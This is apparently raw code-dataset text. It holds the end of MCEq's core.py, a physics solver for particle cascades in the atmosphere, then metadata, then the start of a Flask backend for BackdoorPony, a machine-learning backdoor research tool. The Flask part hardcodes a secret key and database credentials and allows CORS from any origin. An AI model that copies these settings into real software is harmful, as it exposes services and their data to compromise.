\\\\text{GeV}`.\n\n Args:\n E (float): kinetic energy of a nucleus in GeV\n corsika_id (int): ID of a nucleus (see text)\n pdg_id (int): PDG ID of a particle\n append (bool): If True, keep previous state and append a new particle.\n \"\"\"\n import warnings\n from scipy.linalg import solve\n from MCEq.misc import getAZN_corsika, getAZN\n\n if corsika_id and pdg_id:\n raise Exception('Provide either corsika or PDG ID')\n\n info(\n 2, 'CORSIKA ID {0}, PDG ID {1}, energy {2:5.3g} GeV'.format(\n corsika_id, pdg_id, E))\n\n if append == False:\n self._restore_initial_condition = [(self.set_single_primary_particle, E,\n corsika_id, pdg_id)]\n self._phi0 *= 0.\n else:\n self._restore_initial_condition.append((self.set_single_primary_particle, E,\n corsika_id, pdg_id))\n egrid = self._energy_grid.c\n ebins = self._energy_grid.b\n ewidths = self._energy_grid.w\n\n if corsika_id:\n n_nucleons, n_protons, n_neutrons = getAZN_corsika(corsika_id)\n elif pdg_id:\n n_nucleons, n_protons, n_neutrons = getAZN(pdg_id)\n\n En = E / float(n_nucleons) if n_nucleons > 0 else E\n\n if En < np.min(self._energy_grid.c):\n raise Exception('energy per nucleon too low for primary ' +\n str(corsika_id))\n\n info(3, ('superposition: n_protons={0}, n_neutrons={1}, ' +\n 'energy per nucleon={2:5.3g} GeV').format(\n n_protons, n_neutrons, En))\n\n cenbin = np.argwhere(En < ebins)[0][0] - 1\n\n # Equalize the first three moments for 3 normalizations around the central\n # bin\n emat = np.vstack(\n (ewidths[cenbin - 1:cenbin + 2],\n ewidths[cenbin - 1:cenbin + 2] * egrid[cenbin - 1:cenbin + 2],\n ewidths[cenbin - 1:cenbin + 2] * egrid[cenbin - 1:cenbin + 2]**2))\n\n if n_nucleons == 0:\n # This case handles other exotic projectiles\n b_particle = np.array([1., En, En**2])\n lidx = self.pman[pdg_id].lidx\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n self._phi0[lidx + cenbin - 1:lidx + cenbin + 2] += solve(\n emat, b_particle)\n return\n\n if n_protons > 0:\n b_protons = np.array(\n [n_protons, En * n_protons, En**2 * n_protons])\n p_lidx = self.pman[2212].lidx\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n self._phi0[p_lidx + cenbin - 1:p_lidx + cenbin + 2] += solve(\n emat, b_protons)\n if n_neutrons > 0:\n b_neutrons = np.array(\n [n_neutrons, En * n_neutrons, En**2 * n_neutrons])\n n_lidx = self.pman[2112].lidx\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n self._phi0[n_lidx + cenbin - 1:n_lidx + cenbin + 2] += solve(\n emat, b_neutrons)\n\n def set_initial_spectrum(self, spectrum, pdg_id=None, append=False):\n \"\"\"Set a user-defined spectrum for an arbitrary species as initial condition. \n\n This function is an equivalent to :func:`set_single_primary_particle`. It\n allows to define an arbitrary spectrum for each available particle species\n as initial condition for the integration. Set the `append` argument to `True`\n for subsequent species to define initial spectra combined from different particles.\n\n The (differential) spectrum has to be distributed on the energy grid as dN/dptot, i.e.\n divided by the bin widths and with the total momentum units in GeV(/c).\n\n Args:\n spectrum (np.array): spectrum dN/dptot\n pdg_id (int): PDG ID in case of a particle \n \"\"\"\n\n from MCEq.misc import getAZN_corsika, getAZN\n\n info(2, 'PDG ID {0}'.format(pdg_id))\n\n if not append:\n self._restore_initial_condition = [(self.set_initial_spectrum,\n pdg_id, append)]\n self._phi0 *= 0\n else:\n self._restore_initial_condition.append((self.set_initial_spectrum,\n pdg_id, append))\n egrid = self._energy_grid.c\n ebins = self._energy_grid.b\n ewidths = self._energy_grid.w\n\n if len(spectrum) != self.dim:\n raise Exception(\n 'Lengths of spectrum and energy grid do not match.')\n\n self._phi0[self.pman[pdg_id].lidx:self.pman[pdg_id].uidx] += spectrum\n\n def set_density_model(self, density_config):\n \"\"\"Sets model of the atmosphere.\n\n To choose, for example, a CORSIKA parametrization for the Southpole in January,\n do the following::\n\n mceq_instance.set_density_model(('CORSIKA', ('PL_SouthPole', 'January')))\n\n More details about the choices can be found in :mod:`MCEq.geometry.density_profiles`. Calling\n this method will issue a recalculation of the interpolation and the integration path.\n\n From version 1.2 and above, the `density_config` parameter can be a reference to\n an instance of a density class directly. The class has to be derived either from\n :class:`MCEq.geometry.density_profiles.EarthsAtmosphere` or\n :class:`MCEq.geometry.density_profiles.GeneralizedTarget`.\n\n Args:\n density_config (tuple of strings): (parametrization type, arguments)\n \"\"\"\n import MCEq.geometry.density_profiles as dprof\n \n # Check if string arguments or an instance of the density class is provided \n if not isinstance(density_config, (dprof.EarthsAtmosphere, dprof.GeneralizedTarget)):\n \n base_model, model_config = density_config\n\n available_models = [\n 'MSIS00', 'MSIS00_IC', 'CORSIKA', 'AIRS', 'Isothermal',\n 'GeneralizedTarget'\n ]\n\n if base_model not in available_models:\n info(0, 'Unknown density model. Available choices are:\\n',\n '\\n'.join(available_models))\n raise Exception('Choose a different profile.')\n\n info(1, 'Setting density profile to', base_model, model_config)\n\n if base_model == 'MSIS00':\n self.density_model = dprof.MSIS00Atmosphere(*model_config)\n elif base_model == 'MSIS00_IC':\n self.density_model = dprof.MSIS00IceCubeCentered(*model_config)\n elif base_model == 'CORSIKA':\n self.density_model = dprof.CorsikaAtmosphere(*model_config)\n elif base_model == 'AIRS':\n self.density_model = dprof.AIRSAtmosphere(*model_config)\n elif base_model == 'Isothermal':\n self.density_model = dprof.IsothermalAtmosphere(*model_config)\n elif base_model == 'GeneralizedTarget':\n self.density_model = dprof.GeneralizedTarget()\n else:\n raise Exception('Unknown atmospheric base model.')\n self.density_config = density_config \n\n else:\n self.density_model = density_config\n self.density_config = density_config\n\n if self.theta_deg is not None and isinstance(self.density_model, dprof.EarthsAtmosphere):\n self.set_theta_deg(self.theta_deg)\n elif isinstance(self.density_model, dprof.GeneralizedTarget):\n self.integration_path = None\n else:\n raise Exception('Density model not supported.')\n\n # TODO: Make the pman aware of that density might have changed and\n # indices as well\n # self.pmod._gen_list_of_particles()\n\n def set_theta_deg(self, theta_deg):\n \"\"\"Sets zenith angle :math:`\\\\theta` as seen from a detector.\n\n Currently only 'down-going' angles (0-90 degrees) are supported.\n\n Args:\n theta_deg (float): zenith angle in the range 0-90 degrees\n \"\"\"\n import MCEq.geometry.density_profiles as dprof\n \n info(2, 'Zenith angle {0:6.2f}'.format(theta_deg))\n\n if isinstance(self.density_model, dprof.GeneralizedTarget):\n raise Exception('GeneralizedTarget does not support angles.')\n\n if self.density_model.theta_deg == theta_deg:\n info(2,\n 'Theta selection correponds to cached value, skipping calc.')\n return\n\n self.density_model.set_theta(theta_deg)\n self.integration_path = None\n\n\n def set_mod_pprod(self,\n prim_pdg,\n sec_pdg,\n x_func,\n x_func_args,\n delay_init=False):\n \"\"\"Sets combination of projectile/secondary for error propagation.\n\n The production spectrum of ``sec_pdg`` in interactions of\n ``prim_pdg`` is modified according to the function passed to\n :func:`InteractionYields.init_mod_matrix`\n\n Args:\n prim_pdg (int): interacting (primary) particle PDG ID\n sec_pdg (int): secondary particle PDG ID\n x_func (object): reference to function\n x_func_args (tuple): arguments passed to ``x_func``\n delay_init (bool): Prevent init of mceq matrices if you are\n planning to add more modifications\n \"\"\"\n info(\n 1, '{0}/{1}, {2}, {3}'.format(prim_pdg, sec_pdg, x_func.__name__,\n str(x_func_args)))\n\n init = self._interactions._set_mod_pprod(prim_pdg, sec_pdg, x_func,\n x_func_args)\n\n # Need to regenerate matrices completely\n return int(init)\n\n def unset_mod_pprod(self, dont_fill=False):\n \"\"\"Removes modifications from :func:`MCEqRun.set_mod_pprod`.\n\n Args:\n skip_fill (bool): If `true` do not regenerate matrices\n (has to be done at a later step by hand)\n \"\"\"\n from collections import defaultdict\n info(1, 'Particle production modifications reset to defaults.')\n\n self._interactions.mod_pprod = defaultdict(lambda: {})\n # Need to regenerate matrices completely\n if not dont_fill:\n self.regenerate_matrices()\n\n def regenerate_matrices(self, skip_decay_matrix=False):\n \"\"\"Call this function after applying particle prod. modifications aka\n Barr parameters\"\"\"\n\n # TODO: Not all particles need to be reset and there is some performance loss\n # This can be optmized by refreshing only the particles that change or through\n # lazy evaluation, i.e. hadronic channels dict. calls data.int..get_matrix on demand\n self.pman.set_interaction_model(self._int_cs,\n self._interactions,\n force=True)\n self.int_m, self.dec_m = self.matrix_builder.construct_matrices(\n skip_decay_matrix=skip_decay_matrix)\n\n def solve(self, int_grid=None, grid_var='X', **kwargs):\n \"\"\"Launches the solver.\n\n The setting `integrator` in the config file decides which solver\n to launch.\n\n Args:\n int_grid (list): list of depths at which results are recorded\n grid_var (str): Can be depth `X` or something else (currently only `X` supported)\n kwargs (dict): Arguments are passed directly to the solver methods.\n\n \"\"\"\n info(2, \"Launching {0} solver\".format(config.integrator))\n\n if not kwargs.pop('skip_integration_path', False):\n if int_grid is not None and np.any(np.diff(int_grid) < 0):\n raise Exception('The X values in int_grid are required to be strickly',\n 'increasing.')\n\n # Calculate integration path if not yet happened\n self._calculate_integration_path(int_grid, grid_var)\n else:\n info(2,'Warning: integration path calculation skipped.')\n\n phi0 = np.copy(self._phi0)\n nsteps, dX, rho_inv, grid_idcs = self.integration_path\n\n info(2, 'for {0} integration steps.'.format(nsteps))\n\n import MCEq.solvers\n\n start = time()\n\n if config.kernel_config.lower() == 'numpy':\n kernel = MCEq.solvers.solv_numpy\n args = (nsteps, dX, rho_inv, self.int_m, self.dec_m, phi0,\n grid_idcs)\n\n elif (config.kernel_config.lower() == 'cuda'):\n kernel = MCEq.solvers.solv_CUDA_sparse\n try:\n self.cuda_context.set_matrices(self.int_m, self.dec_m)\n except AttributeError:\n from MCEq.solvers import CUDASparseContext\n self.cuda_context = CUDASparseContext(\n self.int_m, self.dec_m, device_id=self._cuda_device)\n args = (nsteps, dX, rho_inv, self.cuda_context, phi0, grid_idcs)\n\n elif (config.kernel_config.lower() == 'mkl'):\n kernel = MCEq.solvers.solv_MKL_sparse\n args = (nsteps, dX, rho_inv, self.int_m, self.dec_m, phi0,\n grid_idcs)\n\n else:\n raise Exception(\n \"Unsupported integrator setting '{0}'.\".format(\n config.kernel_config))\n\n self._solution, self.grid_sol = kernel(*args)\n\n info(\n 2, 'time elapsed during integration: {0:5.2f}sec'.format(time() -\n start))\n\n def _calculate_integration_path(self, int_grid, grid_var, force=False):\n\n if (self.integration_path and np.alltrue(int_grid == self.int_grid)\n and np.alltrue(self.grid_var == grid_var) and not force):\n info(5, 'skipping calculation.')\n return\n\n self.int_grid, self.grid_var = int_grid, grid_var\n if grid_var != 'X':\n raise NotImplementedError(\n 'the choice of grid variable other than the depth X are not possible, yet.'\n )\n\n max_X = self.density_model.max_X\n ri = self.density_model.r_X2rho\n max_lint = self.matrix_builder.max_lint\n max_ldec = self.matrix_builder.max_ldec\n info(2, 'X_surface = {0:7.2f}g/cm2'.format(max_X))\n\n dX_vec = []\n rho_inv_vec = []\n\n X = 0.0\n step = 0\n grid_step = 0\n grid_idcs = []\n if True or (max_ldec / self.density_model.max_den > max_lint\n and config.leading_process == 'decays'):\n info(3, \"using decays as leading eigenvalues\")\n def delta_X(X): \n return config.stability_margin / (max_ldec * ri(X))\n elif config.leading_process == 'interactions':\n info(2, \"using interactions as leading eigenvalues\")\n def delta_X(X): \n return config.stability_margin / max_lint\n else: \n def delta_X(X):\n dX = min(\n config.stability_margin / (max_ldec * ri(X)),\n config.stability_margin / max_lint)\n # if dX/self.density_model.max_X < 1e-7:\n # raise Exception(\n # 'Stiffness warning: dX <= 1e-7. Check configuration or' +\n # 'manually call MCEqRun._calculate_integration_path(int_grid, \"X\", force=True).')\n return dX\n \n\n dXmax = config.dXmax\n while X < max_X:\n dX = min(delta_X(X), dXmax)\n if (np.any(int_grid) and (grid_step < len(int_grid))\n and (X + dX >= int_grid[grid_step])):\n dX = int_grid[grid_step] - X\n grid_idcs.append(step)\n grid_step += 1\n dX_vec.append(dX)\n rho_inv_vec.append(ri(X))\n X = X + dX\n step += 1\n\n # Integrate\n dX_vec = np.array(dX_vec)\n rho_inv_vec = np.array(rho_inv_vec)\n\n self.integration_path = len(dX_vec), dX_vec, rho_inv_vec, grid_idcs\n\n def n_particles(self, label, grid_idx=None, min_energy_cutoff=1e-1):\n \"\"\"Returns number of particles of type `label` at a grid step above\n an energy threshold for counting.\n \n Args:\n label (str): Particle name\n grid_idx (int): Depth grid index (for profiles)\n min_energy_cutoff (float): Energy threshold > mceq_config.e_min\n \"\"\"\n ie_min = np.argmin(\n np.abs(self.e_bins -\n self.e_bins[self.e_bins >= min_energy_cutoff][0]))\n info(\n 10,\n 'Energy cutoff for particle number calculation {0:4.3e} GeV'.format(\n self.e_bins[ie_min]))\n info(\n 15,\n 'First bin is between {0:3.2e} and {1:3.2e} with midpoint {2:3.2e}'\n .format(self.e_bins[ie_min], self.e_bins[ie_min + 1],\n self.e_grid[ie_min]))\n return np.sum(\n self.get_solution(label, mag=0, integrate=True, grid_idx=grid_idx)[ie_min:])\n\n def n_mu(self, grid_idx=None, min_energy_cutoff=1e-1):\n \"\"\"Returns the number of positive and negative muons at a grid step above\n `min_energy_cutoff`.\n \n Args:\n grid_idx (int): Depth grid index (for profiles)\n min_energy_cutoff (float): Energy threshold > mceq_config.e_min\n \n \"\"\"\n return (self.n_particles('total_mu+', grid_idx=grid_idx, min_energy_cutoff=min_energy_cutoff) +\n self.n_particles('total_mu-', grid_idx=grid_idx, min_energy_cutoff=min_energy_cutoff))\n\n def n_e(self, grid_idx=None, min_energy_cutoff=1e-1):\n \"\"\"Returns the number of electrons plus positrons at a grid step above\n `min_energy_cutoff`.\n \n Args:\n grid_idx (int): Depth grid index (for profiles)\n min_energy_cutoff (float): Energy threshold > mceq_config.e_min\n \"\"\"\n return (self.n_particles('e+', grid_idx=grid_idx, min_energy_cutoff=min_energy_cutoff) +\n self.n_particles('e-', grid_idx=grid_idx, min_energy_cutoff=min_energy_cutoff))\n\n def z_factor(self, projectile_pdg, secondary_pdg, definition='primary_e'):\n \"\"\"Energy dependent Z-factor according to Thunman et al. (1996)\"\"\"\n\n proj = self.pman[projectile_pdg]\n sec = self.pman[secondary_pdg]\n\n if not proj.is_projectile:\n raise Exception('{0} is not a projectile particle.'.format(\n proj.name))\n info(\n 10, 'Computing e-dependent Zfactor for {0} -> {1}'.format(\n proj.name, sec.name))\n if not proj.is_secondary(sec):\n raise Exception('{0} is not a secondary particle of {1}.'.format(\n sec.name, proj.name))\n\n if proj == 2112:\n nuc_flux = self.pmodel.p_and_n_flux(self.e_grid)[2]\n else:\n nuc_flux = self.pmodel.p_and_n_flux(self.e_grid)[1]\n zfac = np.zeros(self.dim)\n\n smat = proj.hadr_yields[sec]\n proj_cs = proj.inel_cross_section()\n zfac = np.zeros_like(self.e_grid)\n\n # Definition wrt CR energy (different from Thunman) on x-axis\n if definition == 'primary_e':\n min_energy = 2.\n for p_eidx, e in enumerate(self.e_grid):\n if e < min_energy:\n min_idx = p_eidx + 1\n continue\n zfac[p_eidx] = np.sum(\n smat[min_idx:p_eidx + 1, p_eidx] * nuc_flux[p_eidx] /\n nuc_flux[min_idx:p_eidx + 1] * proj_cs[p_eidx] /\n proj_cs[min_idx:p_eidx + 1])\n return zfac\n else:\n # Like in Thunman et al. 1996\n for p_eidx, _ in enumerate(self.e_grid):\n zfac[p_eidx] = np.sum(smat[p_eidx, p_eidx:] *\n nuc_flux[p_eidx:] / nuc_flux[p_eidx] *\n proj_cs[p_eidx:] / proj_cs[p_eidx])\n return zfac\n\n def decay_z_factor(self, parent_pdg, child_pdg):\n \"\"\"Energy dependent Z-factor according to Lipari (1993).\"\"\"\n\n proj = self.pman[parent_pdg]\n sec = self.pman[child_pdg]\n\n if proj.is_stable:\n raise Exception('{0} does not decay.'.format(proj.name))\n info(\n 10, 'Computing e-dependent decay Zfactor for {0} -> {1}'.format(\n proj.name, sec.name))\n if not proj.is_child(sec):\n raise Exception('{0} is not a a child particle of {1}.'.format(\n sec.name, proj.name))\n\n cr_gamma = self.pmodel.nucleon_gamma(self.e_grid)\n zfac = np.zeros(self.dim)\n\n zfac = np.zeros_like(self.e_grid)\n for p_eidx, e in enumerate(self.e_grid):\n # if e < min_energy:\n # min_idx = p_eidx + 1\n # continue\n xlab, xdist = proj.dNdec_dxlab(e, sec)\n zfac[p_eidx] = np.trapz(xlab**(-cr_gamma[p_eidx] - 2.) * xdist,\n x=xlab)\n return zfac\n\n\nclass MatrixBuilder(object):\n \"\"\"This class constructs the interaction and decay matrices.\"\"\"\n\n def __init__(self, particle_manager):\n self._pman = particle_manager\n self._energy_grid = self._pman._energy_grid\n self.int_m = None\n self.dec_m = None\n\n self._construct_differential_operator()\n\n def construct_matrices(self, skip_decay_matrix=False):\n r\"\"\"Constructs the matrices for calculation.\n\n These are:\n\n - :math:`\\boldsymbol{M}_{int} = (-\\boldsymbol{1} + \\boldsymbol{C}){\\boldsymbol{\\Lambda}}_{int}`,\n - :math:`\\boldsymbol{M}_{dec} = (-\\boldsymbol{1} + \\boldsymbol{D}){\\boldsymbol{\\Lambda}}_{dec}`.\n\n For debug_levels >= 2 some general information about matrix shape and the number of\n non-zero elements is printed. The intermediate matrices :math:`\\boldsymbol{C}` and\n :math:`\\boldsymbol{D}` are deleted afterwards to save memory.\n\n Set the ``skip_decay_matrix`` flag to avoid recreating the decay matrix. This is not necessary\n if, for example, particle production is modified, or the interaction model is changed.\n\n Args:\n skip_decay_matrix (bool): Omit re-creating D matrix\n\n \"\"\"\n\n from itertools import product\n info(\n 3, \"Start filling matrices. Skip_decay_matrix = {0}\".format(\n skip_decay_matrix))\n\n self._fill_matrices(skip_decay_matrix=skip_decay_matrix)\n\n cparts = self._pman.cascade_particles\n\n # interaction part\n # -I + C\n # In first interaction mode it is just C\n self.max_lint = 0.\n\n for parent, child in product(cparts, cparts):\n idx = (child.mceqidx, parent.mceqidx)\n # Main diagonal\n if child.mceqidx == parent.mceqidx and parent.can_interact:\n # Subtract unity from the main diagonals\n info(10, 'subtracting main C diagonal from', child.name,\n parent.name)\n self.C_blocks[idx][np.diag_indices(self.dim)] -= 1.\n\n if idx in self.C_blocks:\n # Multiply with Lambda_int and keep track the maximal\n # interaction length for the calculation of integration steps\n self.max_lint = np.max([\n self.max_lint,\n np.max(parent.inverse_interaction_length())\n ])\n self.C_blocks[idx] *= parent.inverse_interaction_length()\n\n if child.mceqidx == parent.mceqidx and parent.has_contloss:\n if config.enable_muon_energy_loss and abs(\n parent.pdg_id[0]) == 13:\n info(5, 'Cont. loss for', parent.name)\n self.C_blocks[idx] += self.cont_loss_operator(\n parent.pdg_id)\n if config.enable_em_ion and abs(parent.pdg_id[0]) == 11:\n info(5, 'Cont. loss for', parent.name)\n self.C_blocks[idx] += self.cont_loss_operator(\n parent.pdg_id)\n\n self.int_m = self._csr_from_blocks(self.C_blocks)\n # -I + D\n\n if not skip_decay_matrix or self.dec_m is None:\n self.max_ldec = 0.\n for parent, child in product(cparts, cparts):\n idx = (child.mceqidx, parent.mceqidx)\n # Main diagonal\n if child.mceqidx == parent.mceqidx and not parent.is_stable:\n # Subtract unity from the main diagonals\n info(10, 'subtracting main D diagonal from', child.name,\n parent.name)\n self.D_blocks[idx][np.diag_indices(self.dim)] -= 1.\n if idx not in self.D_blocks:\n info(25, parent.pdg_id[0], child.pdg_id, 'not in D_blocks')\n continue\n # Multiply with Lambda_dec and keep track of the\n # maximal decay length for the calculation of integration steps\n self.max_ldec = max(\n [self.max_ldec,\n np.max(parent.inverse_decay_length())])\n self.D_blocks[idx] *= parent.inverse_decay_length()\n\n self.dec_m = self._csr_from_blocks(self.D_blocks)\n\n for mname, mat in [('C', self.int_m), ('D', self.dec_m)]:\n mat_density = (float(mat.nnz) / float(np.prod(mat.shape)))\n info(5, \"{0} Matrix info:\".format(mname))\n info(5, \" density : {0:3.2%}\".format(mat_density))\n info(5, \" shape : {0} x {1}\".format(*mat.shape))\n info(5, \" nnz : {0}\".format(mat.nnz))\n info(10, \" sum :\", mat.sum())\n\n info(3, \"Done filling matrices.\")\n\n return self.int_m, self.dec_m\n\n def _average_operator(self, op_mat):\n \"\"\"Averages the continuous loss operator by performing\n 1/max_step explicit euler steps\"\"\"\n\n n_steps = int(1. / config.loss_step_for_average)\n info(\n 10,\n 'Averaging continuous loss using {0} intermediate steps.'.format(\n n_steps))\n\n op_step = np.eye(\n self._energy_grid.d) + op_mat * config.loss_step_for_average\n return np.linalg.matrix_power(op_step, n_steps) - np.eye(\n self._energy_grid.d)\n\n def cont_loss_operator(self, pdg_id):\n \"\"\"Returns continuous loss operator that can be summed with appropriate\n position in the C matrix.\"\"\"\n op_mat = -np.diag(1 / self._energy_grid.c).dot(\n self.op_matrix.dot(np.diag(self._pman[pdg_id].dEdX)))\n\n if config.average_loss_operator:\n return self._average_operator(op_mat)\n else:\n return op_mat\n\n @property\n def dim(self):\n \"\"\"Energy grid (dimension)\"\"\"\n return self._pman.dim\n\n @property\n def dim_states(self):\n \"\"\"Number of cascade particles times dimension of grid\n (dimension of the equation system)\"\"\"\n return self._pman.dim_states\n\n def _zero_mat(self):\n \"\"\"Returns a new square zero valued matrix with dimensions of grid.\n \"\"\"\n return np.zeros((self._pman.dim, self._pman.dim))\n\n def _csr_from_blocks(self, blocks):\n \"\"\"Construct a csr matrix from a dictionary of submatrices (blocks)\n\n Note::\n\n It's super pain the a** to construct a properly indexed sparse matrix\n directly from the blocks, since bmat totally messes up the order.\n \"\"\"\n from scipy.sparse import csr_matrix\n\n new_mat = np.zeros((self.dim_states, self.dim_states))\n for (c, p), d in six.iteritems(blocks):\n rc, rp = self._pman.mceqidx2pref[c], self._pman.mceqidx2pref[p]\n try:\n new_mat[rc.lidx:rc.uidx, rp.lidx:rp.uidx] = d\n except ValueError:\n raise Exception(\n 'Dimension mismatch: matrix {0}x{1}, p={2}:({3},{4}), c={5}:({6},{7})'\n .format(self.dim_states, self.dim_states, rp.name, rp.lidx,\n rp.uidx, rc.name, rc.lidx, rc.uidx))\n return csr_matrix(new_mat)\n\n def _follow_chains(self, p, pprod_mat, p_orig, idcs, propmat, reclev=0):\n \"\"\"Some recursive magic.\n \"\"\"\n info(40, reclev * '\\t', 'entering with', p.name)\n # print 'orig, p', p_orig.pdg_id, p.pdg_id\n for d in p.children:\n info(40, reclev * '\\t', 'following to', d.name)\n if not d.is_resonance:\n # print 'adding stuff', p_orig.pdg_id, p.pdg_id, d.pdg_id\n dprop = self._zero_mat()\n p._assign_decay_idx(d, idcs, d.hadridx, dprop)\n propmat[(d.mceqidx, p_orig.mceqidx)] += dprop.dot(pprod_mat)\n\n if config.debug_level >= 20:\n pstr = 'res'\n dstr = 'Mchain'\n if idcs == p.hadridx:\n pstr = 'prop'\n dstr = 'Mprop'\n info(\n 40, reclev * '\\t',\n 'setting {0}[({1},{3})->({2},{4})]'.format(\n dstr, p_orig.name, d.name, pstr, 'prop'))\n\n if d.is_mixed or d.is_resonance:\n dres = self._zero_mat()\n p._assign_decay_idx(d, idcs, d.residx, dres)\n reclev += 1\n self._follow_chains(d, dres.dot(pprod_mat), p_orig, d.residx,\n propmat, reclev)\n else:\n info(20, reclev * '\\t', '\\t terminating at', d.name)\n\n def _fill_matrices(self, skip_decay_matrix=False):\n \"\"\"Generates the interaction and decay matrices from scratch.\n \"\"\"\n from collections import defaultdict\n\n # Fill decay matrix blocks\n if not skip_decay_matrix or self.dec_m is None:\n # Initialize empty D matrix\n self.D_blocks = defaultdict(lambda: self._zero_mat())\n for p in self._pman.cascade_particles:\n # Fill parts of the D matrix related to p as mother\n if not p.is_stable and bool(p.children) and not p.is_tracking:\n self._follow_chains(p,\n np.diag(np.ones((self.dim))),\n p,\n p.hadridx,\n self.D_blocks,\n reclev=0)\n else:\n info(20, p.name, 'stable or not added to D matrix')\n\n # Initialize empty C blocks\n self.C_blocks = defaultdict(lambda: self._zero_mat())\n for p in self._pman.cascade_particles:\n # if p doesn't interact, skip interaction matrices\n if not p.is_projectile:\n if p.is_hadron:\n info(\n 1, 'No interactions by {0} ({1}).'.format(\n p.name, p.pdg_id))\n continue\n for s in p.hadr_secondaries:\n # if s not in self.pman.cascade_particles:\n # print 'Doing nothing with', p.pdg_id, s.pdg_id\n # continue\n\n if not s.is_resonance:\n cmat = self._zero_mat()\n p._assign_hadr_dist_idx(s, p.hadridx, s.hadridx, cmat)\n self.C_blocks[(s.mceqidx, p.mceqidx)] += cmat\n\n cmat = self._zero_mat()\n p._assign_hadr_dist_idx(s, p.hadridx, s.residx, cmat)\n self._follow_chains(s,\n cmat,\n p,\n s.residx,\n self.C_blocks,\n reclev=1)\n\n def _construct_differential_operator(self):\n \"\"\"Constructs a derivative operator for the contiuous losses.\n\n This implmentation uses a 6th-order finite differences operator,\n only depends on the energy grid. This is an operator for a sub-matrix\n of dimension (energy grid, energy grid) for a single particle. It\n can be likewise applied to all particle species. The dEdX values are\n applied later in ...\n \"\"\"\n # First rows of operator matrix (values are truncated at the edges\n # of a matrix.)\n diags_leftmost = [0, 1, 2, 3]\n coeffs_leftmost = [-11, 18, -9, 2]\n denom_leftmost = 6\n diags_left_1 = [-1, 0, 1, 2, 3]\n coeffs_left_1 = [-3, -10, 18, -6, 1]\n denom_left_1 = 12\n diags_left_2 = [-2, -1, 0, 1, 2, 3]\n coeffs_left_2 = [3, -30, -20, 60, -15, 2]\n denom_left_2 = 60\n\n # Centered diagonals\n # diags = [-3, -2, -1, 1, 2, 3]\n # coeffs = [-1, 9, -45, 45, -9, 1]\n # denom = 60.\n diags = diags_left_2\n coeffs = coeffs_left_2\n denom = 60.\n\n # Last rows at the right of operator matrix\n diags_right_2 = [-d for d in diags_left_2[::-1]]\n coeffs_right_2 = [-d for d in coeffs_left_2[::-1]]\n denom_right_2 = denom_left_2\n diags_right_1 = [-d for d in diags_left_1[::-1]]\n coeffs_right_1 = [-d for d in coeffs_left_1[::-1]]\n denom_right_1 = denom_left_1\n diags_rightmost = [-d for d in diags_leftmost[::-1]]\n coeffs_rightmost = [-d for d in coeffs_leftmost[::-1]]\n denom_rightmost = denom_leftmost\n\n h = np.log(self._energy_grid.b[1:] / self._energy_grid.b[:-1])\n dim_e = self._energy_grid.d\n last = dim_e - 1\n\n op_matrix = np.zeros((dim_e, dim_e))\n op_matrix[0, np.asarray(diags_leftmost)] = np.asarray(\n coeffs_leftmost) / (denom_leftmost * h[0])\n op_matrix[1, 1 +\n np.asarray(diags_left_1)] = np.asarray(coeffs_left_1) / (\n denom_left_1 * h[1])\n op_matrix[2, 2 +\n np.asarray(diags_left_2)] = np.asarray(coeffs_left_2) / (\n denom_left_2 * h[2])\n op_matrix[last, last + np.asarray(diags_rightmost)] = np.asarray(\n coeffs_rightmost) / (denom_rightmost * h[last])\n op_matrix[last - 1, last - 1 +\n np.asarray(diags_right_1)] = np.asarray(coeffs_right_1) / (\n denom_right_1 * h[last - 1])\n op_matrix[last - 2, last - 2 +\n np.asarray(diags_right_2)] = np.asarray(coeffs_right_2) / (\n denom_right_2 * h[last - 2])\n for row in range(3, dim_e - 3):\n op_matrix[row, row +\n np.asarray(diags)] = np.asarray(coeffs) / (denom *\n h[row])\n\n self.op_matrix = op_matrix\n","repo_name":"mceq-project/MCEq","sub_path":"MCEq/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":54114,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"61"} +{"seq_id":"3915928739","text":"# These are the packages we are inspecting\nimport copy\nimport json\n\n\nimport backdoorpony.attacks\nimport backdoorpony.defences\nimport backdoorpony.metrics\nfrom backdoorpony.app_tracker import AppTracker\nfrom backdoorpony.dynamic_imports import import_submodules_attributes\nfrom flask import Flask, jsonify, request\n# Instantiate the app\nfrom flask_cors import CORS, cross_origin\n\n# temporary map\ndataset_to_model = {\n \"IMDB\": \"IMDB_LSTM_RNN\",\n \"MNIST\": \"MNIST_CNN\",\n \"CIFAR10\": \"CifarCNN\",\n \"Fashion_MNIST\": \"FMNIST_CNN\",\n \"Audio_MNIST\": \"Audio_MNIST_RNN\",\n \"AIDS\": \"AIDS_sage\",\n \"Mutagenicity\": \"Mutagenicity_sage\",\n \"IMDB MULTI\": \"IMDB_MULTI_sage\",\n \"Yeast\": \"Yeast_sage\",\n \"Synthie\": \"Synthie_sage\",\n \"Audio_VGD\": \"Audio_VGD_CNN\",\n \"AMAZON\": \"AMAZON_CNN\"\n}\n\n\napp = Flask(__name__)\napp.config.from_object(__name__)\napp.config['SECRET_KEY'] = 'df0a17bc371e1b72883f3df3cc0928dd'\napp.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+mysqlconnector://pony:backdoor@mariadb:3306/bpdb'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\n# Enable CORS\n\nCORS(app, resources={r'/*': {'origins': '*'}})\n\napp_tracker = AppTracker()\n\n@app.route('/home')\ndef home():\n '''Returns welcome string.'''\n jsonString = 'Welcome to BackdoorPony!'\n return jsonString\n\n\n# Models & Classifiers -------------------------------------------------\n\n@app.route('/get_datasets', methods=['GET'])\ndef get_datasets():\n '''Provides all available datasets\n\n Should return the following:\n {\n 'image': [\n 'MNIST',\n 'CIFAR10'\n ],\n 'text': [\n 'IMDB'\n ],\n 'audio': [...],\n 'graph': [...]\n }\n '''\n return jsonify(app_tracker.model_loader.get_datasets())\n\n\n@app.route('/select_model', methods=['POST'])\n@cross_origin()\ndef select_model():\n '''Select which model is used to create the classifier.\n Can be either a built-in one or have a file with the model attached which is then used.\n\n\n Should receive the following, where values between <> can vary:\n form:\n {\n 'type': '',\n 'dataset': '',\n }\n file (optional):\n {\n 'model': <.pth file>\n }\n '''\n model_params = json.loads(request.form['modelParams'].replace(\"'\", '\"'))\n app_tracker.model_params = model_params\n app_tracker.dataset = request.form['dataset']\n model = None\n if 'model' in request.files:\n 